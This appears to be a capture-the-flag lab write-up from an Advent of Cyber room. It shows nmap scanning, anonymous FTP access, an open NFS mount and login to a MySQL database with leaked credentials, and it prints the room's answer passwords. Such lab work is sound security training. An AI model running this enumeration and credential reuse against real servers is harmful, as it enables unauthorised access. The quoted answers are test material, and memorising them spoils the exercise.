McSkidy has been happy with the progress they’ve been making, but there’s still so much to do. One of their main servers has some integral services running, but they can’t access these services. Did the Christmas Monster lock them out?
Deploy the machine and starting scanning the IP. The machine may take a few minutes to boot up.
Check out the supporting material here.
How to Mount an NFS Share in Linux
Setup
1nmap -sV -sC --script vuln
On the nmap result we can see the port 21 (tcp) is open and the anonymous login is allowed
1kali@kali:~$ nmap -sV -sC 10.10.18.1842Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 19:00 EDT3Nmap scan report for 10.10.18.1844Host is up (0.068s latency).5Not shown: 996 closed ports6PORT STATE SERVICE VERSION7"21/tcp" open ftp vsftpd 3.0.28| ftp-anon: "Anonymous FTP login allowed" (FTP code 230)9|_Can't get directory listing: PASV failed: 500 OOPS: invalid pasv_address10| ftp-syst:11| STAT:12| FTP server status:13| Connected to 10.9.45.7414| Logged in as ftp15| TYPE: ASCII16| No session bandwidth limit17| Session timeout in seconds is 30018| Control connection is plain text19| Data connections will be plain text20| At session startup, client count was 321| vsFTPd 3.0.2 - secure, fast, stable22|_End of status
1ftp 10.10.18.1842cred : anonymous3pass : none
1ftp> ls2200 PORT command successful. Consider using PASV.3150 Here comes the directory listing.4-rwxrwxrwx 1 0 0 39 Dec 10 23:19 file.txt5drwxr-xr-x 2 0 0 6 Nov 04 2019 pub6d-wx-wx--x 2 14 50 6 Nov 04 2019 uploads7-rw-r--r-- 1 0 0 224 Nov 04 2019 welcome.msg8226 Directory send OK.
1ftp> get file.txt2local: file.txt remote: file.txt3200 PORT command successful. Consider using PASV.4150 Opening BINARY mode data connection for file.txt (39 bytes).5226 Transfer complete.639 bytes received in 0.00 secs (507.8125 kB/s)
1kali@kali:~$ cat file.txt2remember to wipe mysql:3"root"4"ff912ABD*"
#1 What is the password inside the creds.txt file? (hint: NFS)
After the setup we can connect to the mysql database
1mysql -h 10.10.18.184 -uroot -pff912ABD*
1kali@kali:~$ mysql -h 10.10.18.184 -uroot -pff912ABD*2Welcome to the MariaDB monitor. Commands end with ; or \g.3Your MySQL connection id is 94Server version: 5.7.28 MySQL Community Server (GPL)56Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.78Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.910MySQL [(none)]> show databases;11+--------------------+12| Database |13+--------------------+14| information_schema |15| data |16| mysql |17| performance_schema |18| sys |19+--------------------+205 rows in set (0.095 sec)
1MySQL [(none)]> use data;2Reading table information for completion of table and column names3You can turn off this feature to get a quicker startup with -A45Database changed6MySQL [data]> show tables;7+----------------+8| Tables_in_data |9+----------------+10| USERS |11+----------------+121 row in set (0.077 sec)
1kali@kali:~$ sudo showmount -e 10.10.18.1842Export list for 10.10.18.184:3/opt/files *
1kali@kali:~$ sudo mount 10.10.18.184:/opt/files /tmp2kali@kali:~$ ls /tmp3creds.txt4kali@kali:~$ cat /tmp/creds.txt5the password is **securepassword123**
#2 What is the name of the file running on port 21?
1kali@kali:~$ cat **file.txt**2remember to wipe mysql:3root4ff912ABD*
#3 What is the password after enumerating the database?
1MySQL [data]> SELECT * FROM USERS;2+-------+--------------+3| name | password |4+-------+--------------+5| admin | bestpassword |6+-------+--------------+71 row in set (0.067 sec)
